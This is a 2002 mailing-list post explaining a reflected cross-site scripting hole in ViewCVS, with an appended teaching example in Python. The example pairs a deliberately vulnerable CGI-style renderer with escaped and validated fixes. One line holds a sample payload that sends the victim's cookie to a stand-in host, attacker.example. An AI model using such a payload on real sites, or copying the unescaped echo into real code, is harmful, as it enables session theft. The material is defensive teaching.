Python cross-site scripting exploits?

Paul Boddie paul at boddie.net
Thu May 23 11:59:09 EDT 2002


Robin Becker <robin at jessikat.fsnet.co.uk> wrote in message news:<DuIBcWA5WK78Ewyc at jessikat.fsnet.co.uk>...
> 

[Cross-site scripting exploit in ViewCVS]

> Can some wizard kindly explain exactly how the client CGI is made
> responsible for security defence against bad URLs. It seems to me that
> the client browser should be responsible, but apparently not.

I haven't read up on these kinds of exploits, but what seems to happen
in this case is that some additional content gets posted to the
application (CGI program), and due to lack of "validation", this
content gets generated by the application "as is". Since this content
is now considered by the browser to have originated from the
application (or rather, its site), the cookie information associated
with that site is available to the additional content, and when some
JavaScript in that content presents the cookie information to another
site, the browser considers this as intentional behaviour of the
application in question.

> The alleged fix seems to involve more complete argument checking, is
> that required for any such defence? What should the request response be?

Argument checking and validation is the key here - never let your
application generate inputs from untrusted sources (i.e. every source)
in the form they were received, regardless of where the output is
going to be used. Having said that, it is surprising that bizarre, and
potentially illegal, URLs can be passed to servers in this way.

Paul
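The mechanism Paul describes, as an added example that is not part of the thread and is not ViewCVS code: a minimal CGI-style handler that echoes a request argument into its HTML page. The parameter name `file`, the path-validation rule and the sample query strings are constructed for illustration. The vulnerable renderer interpolates the argument as received; the escaped renderer applies output encoding; the validated renderer adds the argument checking Robin asked about and answers his question about the response with a 400.

```python
"""Reflected cross-site scripting in a CGI-style handler, and two defences.

Added example (not ViewCVS code).  The parameter name, the validation
rule and the query strings below are assumptions made for illustration.
"""
import re
from html import escape
from urllib.parse import parse_qs

# Constructed attacker input: the query string of a link the attacker sends
# to a victim of the vulnerable site.  If the page echoes the "file" argument
# unchanged, the browser runs the script as though the site had written it,
# so document.cookie is the victim's cookie for *that* site, and the script
# ships it off to attacker.example (an assumed, fictitious host).
MALICIOUS_QUERY = (
    "file=<script>new Image().src="
    "'http://attacker.example/?c='%2Bdocument.cookie</script>"
)
BENIGN_QUERY = "file=src/main.py"

# Assumed rule for what a repository path may look like: word characters,
# dots and dashes joined by '/', with no '..' component anywhere.
_PATH_RE = re.compile(r"^(?!.*(^|/)\.\.(/|$))[A-Za-z0-9_.\-/]+$")


def _file_arg(query_string):
    """The 'file' argument exactly as the CGI would receive it (URL-decoded)."""
    params = parse_qs(query_string, keep_blank_values=True)
    return params.get("file", [""])[0]


def render_vulnerable(query_string):
    """The bug: the argument is interpolated into the page as received."""
    return f"<html><body><h1>Log for {_file_arg(query_string)}</h1></body></html>"


def render_escaped(query_string):
    """Output encoding: whatever the argument contains, the browser sees text.

    quote=True also escapes quotes, so the same helper is safe inside an
    attribute value, not only in element content."""
    safe = escape(_file_arg(query_string), quote=True)
    return f"<html><body><h1>Log for {safe}</h1></body></html>"


def render_validated(query_string):
    """Argument checking: refuse any request whose argument is not a
    plausible path (HTTP 400), and still escape what is echoed.  The two
    defences stack; validation narrows input, escaping protects output."""
    path = _file_arg(query_string)
    if not _PATH_RE.match(path):
        return 400, "<html><body><h1>400 Bad Request</h1></body></html>"
    return 200, f"<html><body><h1>Log for {escape(path, quote=True)}</h1></body></html>"


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(MALICIOUS_QUERY))
    print("escaped:   ", render_escaped(MALICIOUS_QUERY))
    print("validated: ", render_validated(MALICIOUS_QUERY))
    print("validated: ", render_validated(BENIGN_QUERY))
```

Run it and compare the first two lines of output: the vulnerable page contains a live `<script>` element, the escaped page contains the same characters as `&lt;script&gt;`, which the browser renders as text. The validated version never echoes the attack at all, because the argument fails the path rule before any HTML is built.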
